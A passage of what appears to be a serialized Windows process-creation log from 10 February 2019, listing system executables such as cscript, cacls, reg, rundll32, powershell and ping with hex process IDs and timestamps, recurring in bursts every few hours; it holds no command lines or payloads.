03:45:33.967000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23782019-02-10 03:45:34.187000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x10042019-02-10 03:45:34.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8482019-02-10 03:45:34.233000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x162c2019-02-10 03:45:34.260000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1ce42019-02-10 03:45:34.270000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1be02019-02-10 03:45:34.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xd742019-02-10 03:45:34.317000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1d442019-02-10 03:45:34.330000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x48c2019-02-10 03:45:34.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x19f02019-02-10 03:45:34.560000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5c42019-02-10 03:45:34.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db42019-02-10 03:45:34.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12cc2019-02-10 03:45:47.757000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1df82019-02-10 03:45:47.787000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1ff82019-02-10 03:46:17.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd782019-02-10 03:46:17.073000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xdd02019-02-10 03:46:32.210000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12f82019-02-10 03:46:32.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xf942019-02-10 03:46:57.410000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1eb42019-02-10 03:46:57.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x582019-02-10 03:47:08.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x135c2019-02-10 03:47:08.527000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b282019-02-10 03:47:13.587000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e602019-02-10 03:47:13.610000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xf902019-02-10 03:47:13.623000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5082019-02-10 03:47:13.637000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x21b02019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x3782019-02-10 03:47:37.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21682019-02-10 03:47:37.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2542019-02-10 03:47:37.827000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23282019-02-10 03:48:01.003000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18342019-02-10 03:48:01.020000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xcc02019-02-10 03:48:24.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x15f82019-02-10 03:48:24.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f7c2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x22fc2019-02-10 03:48:49.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15c02019-02-10 03:48:49.297000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19c82019-02-10 03:48:49.317000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19e82019-02-10 03:48:49.327000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xf982019-02-10 03:48:49.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xbbc2019-02-10 03:48:49.370000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb702019-02-10 03:48:49.387000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15902019-02-10 03:48:49.400000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22982019-02-10 03:48:49.417000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xe582019-02-10 03:48:49.433000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x15e42019-02-10 03:48:49.447000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1f002019-02-10 03:48:49.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x23842019-02-10 03:48:49.477000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xa242019-02-10 03:48:49.490000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10702019-02-10 03:48:49.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1df42019-02-10 03:49:12.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20442019-02-10 03:49:12.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15202019-02-10 03:49:36.040000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xedc2019-02-10 03:49:36.060000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16342019-02-10 03:49:59.250000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b282019-02-10 03:49:59.270000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xd7c2019-02-10 03:50:22.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x182c2019-02-10 03:50:22.503000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x20702019-02-10 03:50:45.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f2c2019-02-10 03:50:45.753000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x6f82019-02-10 03:51:08.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10c42019-02-10 03:51:08.957000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x1de42019-02-10 03:51:32.143000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5ac2019-02-10 03:51:32.160000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x8642019-02-10 03:51:55.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5182019-02-10 03:51:56.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d442019-02-10 03:52:19.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x48c2019-02-10 03:52:19.367000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xb102019-02-10 03:52:42.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5c42019-02-10 03:52:42.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23ec2019-02-10 03:53:05.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xde42019-02-10 03:53:05.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x20e42019-02-10 03:53:15.997000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8382019-02-10 03:53:16.010000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x19142019-02-10 03:53:35.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 03:53:35.183000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f7c2019-02-10 03:53:45.243000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7c02019-02-10 04:08:29.163000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x18442019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9002019-02-10 04:08:35.183000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x22c02019-02-10 04:28:02.247000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe0x1ef42019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11ec2019-02-10 04:32:15.800000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1d3c2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20102019-02-10 05:10:21.820000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1fa42019-02-10 05:28:02.243000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x195c2019-02-10 06:00:00.807000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x6002019-02-10 06:21:59.853000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xc602019-02-10 06:28:02.250000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x1ce82019-02-10 06:33:53.853000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7702019-02-10 06:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb702019-02-10 06:44:47.457000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1f842019-02-10 06:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xed82019-02-10 06:44:47.490000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x21b42019-02-10 06:44:59.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19982019-02-10 06:44:59.600000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22042019-02-10 06:45:17.783000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 06:45:17.803000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22b02019-02-10 06:45:22.820000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xa2c2019-02-10 06:45:22.837000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x1a002019-02-10 06:45:22.850000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x3c42019-02-10 06:45:22.867000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1de42019-02-10 06:45:22.897000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21782019-02-10 06:45:23.110000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9802019-02-10 06:45:23.133000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1fe02019-02-10 06:45:23.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1fa42019-02-10 06:45:23.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x14ec2019-02-10 06:45:23.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xcc82019-02-10 06:45:23.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xfcc2019-02-10 06:45:23.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12802019-02-10 06:45:23.260000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x6f82019-02-10 06:45:23.473000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1a5c2019-02-10 06:45:23.487000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8bc2019-02-10 06:45:23.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e42019-02-10 06:45:23.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f602019-02-10 06:45:30.647000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10a42019-02-10 06:45:30.673000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x107c2019-02-10 06:45:32.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21302019-02-10 06:45:32.730000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x13382019-02-10 06:45:48.870000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc682019-02-10 06:45:48.900000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x21d42019-02-10 06:45:49.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa942019-02-10 06:45:49.943000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x8f02019-02-10 06:46:18.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c202019-02-10 06:46:18.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x10bc2019-02-10 06:46:47.443000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12cc2019-02-10 06:46:47.473000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x13a82019-02-10 06:47:03.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb482019-02-10 06:47:03.653000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23d82019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15fc2019-02-10 06:47:25.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22982019-02-10 06:47:25.847000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1a442019-02-10 06:47:25.863000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x21b42019-02-10 06:47:47.063000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19282019-02-10 06:47:47.080000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xdd82019-02-10 06:48:08.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14882019-02-10 06:48:08.320000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1fa42019-02-10 06:48:29.533000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8502019-02-10 06:48:29.587000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x18982019-02-10 06:48:51.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21202019-02-10 06:48:51.720000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8542019-02-10 06:49:12.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x91c2019-02-10 06:49:12.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22f42019-02-10 06:49:34.150000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb642019-02-10 06:49:34.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1a9c2019-02-10 06:49:55.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17d02019-02-10 06:49:55.377000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17d82019-02-10 06:50:16.557000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd142019-02-10 06:50:16.580000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x128c2019-02-10 06:50:37.767000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb042019-02-10 06:50:37.800000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x1c202019-02-10 06:50:58.953000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13602019-02-10 06:50:58.973000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19f02019-02-10 06:51:20.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db02019-02-10 06:51:20.220000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb602019-02-10 06:51:41.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x125c2019-02-10 06:51:41.400000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15902019-02-10 06:52:02.617000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11a82019-02-10 06:52:02.650000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19142019-02-10 06:52:23.833000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10582019-02-10 06:52:23.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x15182019-02-10 06:52:48.113000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5a82019-02-10 06:52:48.127000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x53c2019-02-10 06:53:19.340000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13942019-02-10 06:53:19.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8382019-02-10 06:53:20.400000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x15a82019-02-10 07:28:02.247000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1cdc2019-02-10 08:28:02.253000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x19482019-02-10 09:07:02.863000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x6342019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e8c2019-02-10 09:13:15.387000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x181c2019-02-10 09:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e682019-02-10 09:44:47.263000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23482019-02-10 09:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x125c2019-02-10 09:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13742019-02-10 09:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xd582019-02-10 09:45:02.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22302019-02-10 09:45:02.660000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x13c02019-02-10 09:45:21.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4e02019-02-10 09:45:21.843000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12e02019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbd02019-02-10 09:45:46.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe582019-02-10 09:45:46.153000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x18502019-02-10 09:45:46.167000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x23ec2019-02-10 09:45:46.190000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16f42019-02-10 09:45:46.210000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b742019-02-10 09:45:46.247000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x12d02019-02-10 09:45:46.273000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16102019-02-10 09:45:46.290000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x6482019-02-10 09:45:46.313000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x23b82019-02-10 09:45:46.323000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xf542019-02-10 09:45:46.347000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x20b02019-02-10 09:45:46.370000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1dec2019-02-10 09:45:46.383000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1bbc2019-02-10 09:45:46.417000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xa242019-02-10 09:45:46.430000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16bc2019-02-10 09:45:46.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf802019-02-10 09:45:46.500000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xf082019-02-10 09:45:48.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xe502019-02-10 09:45:48.553000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x4902019-02-10 09:45:57.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa582019-02-10 09:45:57.657000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b002019-02-10 09:46:15.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23a42019-02-10 09:46:15.843000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d9c2019-02-10 09:46:24.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13982019-02-10 09:46:24.950000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xb282019-02-10 09:46:37.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21642019-02-10 09:46:37.080000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11982019-02-10 09:46:58.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd042019-02-10 09:46:58.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xce02019-02-10 09:46:58.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x3b82019-02-10 09:46:58.327000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f602019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x10ac2019-02-10 09:47:18.497000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb382019-02-10 09:47:18.510000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14802019-02-10 09:47:18.533000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xe2c2019-02-10 09:47:37.713000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 09:47:37.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x20482019-02-10 09:47:56.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x128c2019-02-10 09:47:56.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xed82019-02-10 09:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x107c2019-02-10 09:48:16.877000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x13f82019-02-10 09:48:36.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19402019-02-10 09:48:36.513000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x212c2019-02-10 09:48:55.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f882019-02-10 09:48:55.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xbd02019-02-10 09:49:15.120000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4382019-02-10 09:49:15.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xbd82019-02-10 09:49:34.323000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x115c2019-02-10 09:49:34.340000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x203c2019-02-10 09:49:53.497000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 09:49:53.520000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23282019-02-10 09:50:12.667000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b282019-02-10 09:50:12.697000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xfe02019-02-10 09:50:31.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2582019-02-10 09:50:31.913000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x7702019-02-10 09:50:51.110000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x84c2019-02-10 09:50:51.897000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2482019-02-10 09:51:11.057000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20182019-02-10 09:51:11.070000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xd702019-02-10 09:51:30.233000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xccc2019-02-10 09:51:30.253000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16802019-02-10 09:51:49.427000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12602019-02-10 09:51:49.493000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x23f82019-02-10 09:51:54.560000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1bb42019-02-10 09:51:54.577000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xcfc2019-02-10 09:52:04.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xdd82019-02-10 09:52:04.717000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14082019-02-10 09:52:29.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1ce82019-02-10 10:28:02.243000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1d082019-02-10 11:28:02.237000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x11782019-02-10 11:46:27.867000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x1dd82019-02-10 12:00:00.817000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x10c42019-02-10 12:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8f82019-02-10 12:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20182019-02-10 12:44:47.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17ec2019-02-10 12:44:47.453000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5942019-02-10 12:44:47.473000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x1f882019-02-10 12:45:04.610000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14d82019-02-10 12:45:04.627000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1b282019-02-10 12:45:24.803000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfc02019-02-10 12:45:24.827000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xfc82019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23a82019-02-10 12:45:35.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16802019-02-10 12:45:35.893000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23e82019-02-10 12:45:35.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x55c2019-02-10 12:45:35.923000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xadc2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x13982019-02-10 12:45:36.087000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17502019-02-10 12:45:36.113000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x11f02019-02-10 12:45:36.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5ac2019-02-10 12:45:36.163000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xa902019-02-10 12:45:36.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xc4c2019-02-10 12:45:36.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb002019-02-10 12:45:36.230000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x154c2019-02-10 12:45:36.257000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xeb02019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x9602019-02-10 12:45:36.440000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x158c2019-02-10 12:45:36.470000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1be02019-02-10 12:45:36.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x2dc2019-02-10 12:45:36.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x221c2019-02-10 12:45:36.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xc982019-02-10 12:46:05.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2482019-02-10 12:46:05.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x18782019-02-10 12:46:22.017000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x84c2019-02-10 12:46:22.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x18982019-02-10 12:46:42.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6c02019-02-10 12:46:42.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x125c2019-02-10 12:46:59.397000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13742019-02-10 12:46:59.413000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xf582019-02-10 12:47:28.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-10 12:47:28.670000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xefc2019-02-10 12:47:41.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13d82019-02-10 12:47:41.813000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x19e82019-02-10 12:47:57.960000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x7fc2019-02-10 12:47:57.977000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x107c2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 